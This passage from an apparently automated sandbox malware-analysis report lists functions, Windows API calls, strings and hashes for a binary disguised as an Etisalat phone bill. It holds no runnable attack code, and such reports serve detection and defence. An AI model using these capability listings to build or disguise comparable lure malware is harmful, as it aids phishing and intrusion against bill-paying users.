                                      • Instruction Fuzzy Hash: BE914D706006019FDB64DF64C884EBAB7E9FF49710F1485ADF94ACB6A1DBB0E840CB50
                                      Function 00BCB217 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 201shareCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00B7FEC6: _wcscpy.LIBCMT ref: 00B7FEE9
                                        • Part of subcall function 00B69997: __itow.LIBCMT ref: 00B699C2
                                        • Part of subcall function 00B69997: __swprintf.LIBCMT ref: 00B69A0C
                                      • __wcsnicmp.LIBCMT ref: 00BCB298
                                      • WNetUseConnectionW.MPR(00000000,?,?,00000000,?,?,00000100,?), ref: 00BCB361
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                      • Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID: Connection__itow__swprintf__wcsnicmp_wcscpy
                                      • String ID: LPT
                                      • API String ID: 3222508074-1350329615
                                      • Opcode ID: aabe29c851cc3fc46fbad06c588469ef9c6a7ec15e69e5f872b4b374e8d422d9
                                      • Instruction ID: f6bfde94443aa5d0542581dba6c1f05f91da968ee7fe05e1be7ca991f22d06ea
                                      • Opcode Fuzzy Hash: aabe29c851cc3fc46fbad06c588469ef9c6a7ec15e69e5f872b4b374e8d422d9
                                      • Instruction Fuzzy Hash: 8F615075A00215AFCB14DF94C886FAEB7F8EF48710F1540AEF946AB291DB74AE40CB54
                                      Function 00B72AB7 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 144sleepCOMMON
                                      Download Yara Rule
                                      APIs
                                      • Sleep.KERNEL32(00000000), ref: 00B72AC8
                                      • GlobalMemoryStatusEx.KERNEL32(?), ref: 00B72AE1
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                      • Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID: GlobalMemorySleepStatus
                                      • String ID: @
                                      • API String ID: 2783356886-2766056989
                                      • Opcode ID: 648b4e0b60c5494309207747b301bc05bf0863cb92c51903bcd6781cf6c99966
                                      • Instruction ID: 4197b343bd20c00d52b174402af0b77c6e64157fd59678b43bcdf388d4668ff6
                                      • Opcode Fuzzy Hash: 648b4e0b60c5494309207747b301bc05bf0863cb92c51903bcd6781cf6c99966
                                      • Instruction Fuzzy Hash: 2C514672418B449BD320AF50DC86BAFBBECFF84710F42889DF2D9511A5DB348529CB26
                                      Function 00BC99BE Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 138COMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00B6506B: __fread_nolock.LIBCMT ref: 00B65089
                                      • _wcscmp.LIBCMT ref: 00BC9AAE
                                      • _wcscmp.LIBCMT ref: 00BC9AC1
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                      • Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID: _wcscmp$__fread_nolock
                                      • String ID: FILE
                                      • API String ID: 4029003684-3121273764
                                      • Opcode ID: efe9b1ca87ce0854fa2f39a066a68888c366059e405be77da4ae617d0f00b0f2
                                      • Instruction ID: e867b17a3eb0bb045bbc50d5abcdcc524c4c3fcf21c15ee0b8b3166602862954
                                      • Opcode Fuzzy Hash: efe9b1ca87ce0854fa2f39a066a68888c366059e405be77da4ae617d0f00b0f2
                                      • Instruction Fuzzy Hash: 3141B571A00619BAEF219AA4DC85FEFBBF9DF45710F0000B9B900A7181DA75AE1587A5
                                      Function 00BD2882 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 97networkCOMMON
                                      Download Yara Rule
                                      APIs
                                      • _memset.LIBCMT ref: 00BD2892
                                      • InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 00BD28C8
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                      • Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID: CrackInternet_memset
                                      • String ID: |
                                      • API String ID: 1413715105-2343686810
                                      • Opcode ID: 1133145e3ecb8d0db4dc0ab70d30253835997db8209fe81686339ba3a1002c12
                                      • Instruction ID: 10468cb45c2ea3f638a9e14f8a9a960d0509a4ab65141c30cf9026b9cc20cfe7
                                      • Opcode Fuzzy Hash: 1133145e3ecb8d0db4dc0ab70d30253835997db8209fe81686339ba3a1002c12
                                      • Instruction Fuzzy Hash: DB312C71800119AFCF01EFA1CC85EEEBFB9FF18310F1041AAF815A6265EB355A56DB60
                                      Function 00BE6CD2 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 95COMMON
                                      Download Yara Rule
                                      APIs
                                      • DestroyWindow.USER32(?,?,?,?), ref: 00BE6D86
                                      • MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 00BE6DC2
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                      • Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID: Window$DestroyMove
                                      • String ID: static
                                      • API String ID: 2139405536-2160076837
                                      • Opcode ID: d59ddba888e331155fb3165b8dee8f6507b3adc633573cc516c096f8a4d70370
                                      • Instruction ID: dc10ec496c328167545422c1b0edb7d0b58de4ccf55087864faf68deb86e1617
                                      • Opcode Fuzzy Hash: d59ddba888e331155fb3165b8dee8f6507b3adc633573cc516c096f8a4d70370
                                      • Instruction Fuzzy Hash: 2D319C71200244AEDB109F69CC80BFB73E9FF98760F508669F8A687190DB31AC91CB60
                                      Function 00BC2D91 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 88windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • _memset.LIBCMT ref: 00BC2E00
                                      • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00BC2E3B
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                      • Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID: InfoItemMenu_memset
                                      • String ID: 0
                                      • API String ID: 2223754486-4108050209
                                      • Opcode ID: 8b2d7ea93548634699146acee38872bdc15b91941cc2da17ee3db518b20327d7
                                      • Instruction ID: f0ee650bacd1e828324166a99a4c0b623f5e3d9a3325328585c99d894474a7da
                                      • Opcode Fuzzy Hash: 8b2d7ea93548634699146acee38872bdc15b91941cc2da17ee3db518b20327d7
                                      • Instruction Fuzzy Hash: E731F531A0030AABEB24DF48C885FEEBBF9EF05340F1840ADE995A61A0D7709940CB20
                                      Function 00BE6943 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 00BE69D0
                                      • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00BE69DB
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                      • Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID: MessageSend
                                      • String ID: Combobox
                                      • API String ID: 3850602802-2096851135
                                      • Opcode ID: 547495b8782f3f303a7ed05a312b9c4555f83d0ae14a8880096d0de097e9f399
                                      • Instruction ID: afaa18ee469c9f89b608a486b6f031a1db5c09c9d9676254e53b5ff6554a5f66
                                      • Opcode Fuzzy Hash: 547495b8782f3f303a7ed05a312b9c4555f83d0ae14a8880096d0de097e9f399
                                      • Instruction Fuzzy Hash: B41104753002486FEF118F25CC80FFB37AAEBA93E4F100264F9589B291D7319C9187A0
                                      Function 00BE6E76 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 68COMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00B61D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00B61D73
                                        • Part of subcall function 00B61D35: GetStockObject.GDI32(00000011), ref: 00B61D87
                                        • Part of subcall function 00B61D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00B61D91
                                      • GetWindowRect.USER32(00000000,?), ref: 00BE6EE0
                                      • GetSysColor.USER32(00000012), ref: 00BE6EFA
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                      • Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID: Window$ColorCreateMessageObjectRectSendStock
                                      • String ID: static
                                      • API String ID: 1983116058-2160076837
                                      • Opcode ID: 4cfc81369325dbe6b0ae6c493ad8c155211b869cc4abe9f281e7e4876d64ef76
                                      • Instruction ID: 9834c1727dd109d42a84bd77d00120114f58ac6231ed7dc7e3bcb0b59c416559
                                      • Opcode Fuzzy Hash: 4cfc81369325dbe6b0ae6c493ad8c155211b869cc4abe9f281e7e4876d64ef76
                                      • Instruction Fuzzy Hash: 8821447261024AAFDB04DFA8DC45AFA7BF8EB18354F004668F955D3251E734E8619B60
                                      Function 00BE6B8F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 64windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetWindowTextLengthW.USER32(00000000), ref: 00BE6C11
                                      • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 00BE6C20
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                      • Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID: LengthMessageSendTextWindow
                                      • String ID: edit
                                      • API String ID: 2978978980-2167791130
                                      • Opcode ID: d604d77e7789c98615613a8d9aad45e7415d93819c41dd7851199d1f379a93e8
                                      • Instruction ID: 464d78387633ddd8f4b052240b64ccacfa1d0507992f8d3c9b600bb4b424fb2e
                                      • Opcode Fuzzy Hash: d604d77e7789c98615613a8d9aad45e7415d93819c41dd7851199d1f379a93e8
                                      • Instruction Fuzzy Hash: 28116D71500188ABEB104F759C86ABB37A9EB253B8F2047A4F961D71E0C775DC919760
                                      Function 00BC2E9E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 63windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • _memset.LIBCMT ref: 00BC2F11
                                      • GetMenuItemInfoW.USER32(00000030,?,00000000,00000030), ref: 00BC2F30
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                      • Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID: InfoItemMenu_memset
                                      • String ID: 0
                                      • API String ID: 2223754486-4108050209
                                      • Opcode ID: 6964556fcf887fd254693e16589768b30c1ed89fecbcec2b40e9b3d55467a4ae
                                      • Instruction ID: d6a5e0ce2e30894c7b6ff934c3d8723dc78986088a44b19118077898fc45320f
                                      • Opcode Fuzzy Hash: 6964556fcf887fd254693e16589768b30c1ed89fecbcec2b40e9b3d55467a4ae
                                      • Instruction Fuzzy Hash: 42118B32901229ABDF21DB58DC84FA977F9EB15310F1840EDE855B72A0D7B0EE0587A1
                                      Function 00BD24CA Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 62networkCOMMON
                                      Download Yara Rule
                                      APIs
                                      • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 00BD2520
                                      • InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 00BD2549
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                      • Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID: Internet$OpenOption
                                      • String ID: <local>
                                      • API String ID: 942729171-4266983199
                                      • Opcode ID: 5c166fb29d405d7567fa8cfb326f6309e24f0a6f544e379fca08b18f17813f3a
                                      • Instruction ID: 8b5bae3a3847656212d918952ffc4e3ace83a3c8f4d506bd69737e429f5b9bf6
                                      • Opcode Fuzzy Hash: 5c166fb29d405d7567fa8cfb326f6309e24f0a6f544e379fca08b18f17813f3a
                                      • Instruction Fuzzy Hash: B011E3701012A5BADB258F519CD5EFBFFA8FB36355F10816BF90546240E2705981DAF0
                                      Function 00BD80A0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 55networkCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00BD830B: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?,00BD80C8,?,00000000,?,?), ref: 00BD8322
                                      • inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 00BD80CB
                                      • htons.WSOCK32(00000000,?,00000000), ref: 00BD8108
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                      • Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID: ByteCharMultiWidehtonsinet_addr
                                      • String ID: 255.255.255.255
                                      • API String ID: 2496851823-2422070025
                                      • Opcode ID: 65ceb32d1602b672240208bf548410998ebda403f8ba2b7a32438005c7510534
                                      • Instruction ID: 190f7e43050bb48e27e2a76a3ef6c9a46bed231fa978de8413e806d436804091
                                      • Opcode Fuzzy Hash: 65ceb32d1602b672240208bf548410998ebda403f8ba2b7a32438005c7510534
                                      • Instruction Fuzzy Hash: AD118274500205ABDB20AF64CC86FFDF3A4EF04321F1085ABE911AB391EA71A815C755
                                      Function 00BB92E7 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 52windowCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00B67F41: _memmove.LIBCMT ref: 00B67F82
                                        • Part of subcall function 00BBB0C4: GetClassNameW.USER32(?,?,000000FF), ref: 00BBB0E7
                                      • SendMessageW.USER32(?,000001A2,000000FF,?), ref: 00BB9355
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                      • Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID: ClassMessageNameSend_memmove
                                      • String ID: ComboBox$ListBox
                                      • API String ID: 372448540-1403004172
                                      • Opcode ID: 6b3a9a7e167e0d49c32d51afa47e08be7fd8b3134e9366a746870485c8b21990
                                      • Instruction ID: cce8e125c3d5e62876933f93522703707ca9b5b62cb98912ebe991812ea45bf0
                                      • Opcode Fuzzy Hash: 6b3a9a7e167e0d49c32d51afa47e08be7fd8b3134e9366a746870485c8b21990
                                      • Instruction Fuzzy Hash: 6F01F171A45214ABCB04FBA0CCA1CFE77E9FF06320B1006A9F972672D2DFB559188650
                                      Function 00BB91DF Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50windowCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00B67F41: _memmove.LIBCMT ref: 00B67F82
                                        • Part of subcall function 00BBB0C4: GetClassNameW.USER32(?,?,000000FF), ref: 00BBB0E7
                                      • SendMessageW.USER32(?,00000180,00000000,?), ref: 00BB924D
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                      • Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID: ClassMessageNameSend_memmove
                                      • String ID: ComboBox$ListBox
                                      • API String ID: 372448540-1403004172
                                      • Opcode ID: fc75e68d1b67fae5f5fca0f2e244c3405409653e649efc53aaf35dc766704979
                                      • Instruction ID: 4a0eb2143061ef621e788aae71a1708495b9edd53ce276b393ffbcd97e9f9e7d
                                      • Opcode Fuzzy Hash: fc75e68d1b67fae5f5fca0f2e244c3405409653e649efc53aaf35dc766704979
                                      • Instruction Fuzzy Hash: 1A018471E411047BCB14EBA0C9A2EFF77E9DF05300F2401A9BA1267292EEA55F189661
                                      Function 00BB9264 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 49windowCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00B67F41: _memmove.LIBCMT ref: 00B67F82
                                        • Part of subcall function 00BBB0C4: GetClassNameW.USER32(?,?,000000FF), ref: 00BBB0E7
                                      • SendMessageW.USER32(?,00000182,?,00000000), ref: 00BB92D0
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                      • Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID: ClassMessageNameSend_memmove
                                      • String ID: ComboBox$ListBox
                                      • API String ID: 372448540-1403004172
                                      • Opcode ID: 1b68999d96886f6c75445e999d46624ab4d74c6ba67bb5e5b3c8301e35be716e
                                      • Instruction ID: 318777b0665fab73804f22616b51e7b93778b3b36ddf73aa8a9c161c1a1ee333
                                      • Opcode Fuzzy Hash: 1b68999d96886f6c75445e999d46624ab4d74c6ba67bb5e5b3c8301e35be716e
                                      • Instruction Fuzzy Hash: A601A271E811087BCB14EBA0C992EFF77ECDF11700F6401A5B91263282DAA55F1C9271
                                      Function 00BC51CA Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 29COMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                      • Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID: ClassName_wcscmp
                                      • String ID: #32770
                                      • API String ID: 2292705959-463685578
                                      • Opcode ID: 857dbcf1c54bcc44aa3e46e8b106321f21578fd0e4cee57a5e13e5c765d35e3c
                                      • Instruction ID: 32da3569a08b892c0f7c897d67f9cce18228faa1413707a28dc31dd0ff78de3a
                                      • Opcode Fuzzy Hash: 857dbcf1c54bcc44aa3e46e8b106321f21578fd0e4cee57a5e13e5c765d35e3c
                                      • Instruction Fuzzy Hash: 7BE06132A0022D17D3209A999C45FE7F7ECEB41B31F00016BFD14D7050D5709E4587E0
                                      Function 00BB81BC Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 22windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 00BB81CA
                                        • Part of subcall function 00B83598: _doexit.LIBCMT ref: 00B835A2
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                      • Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
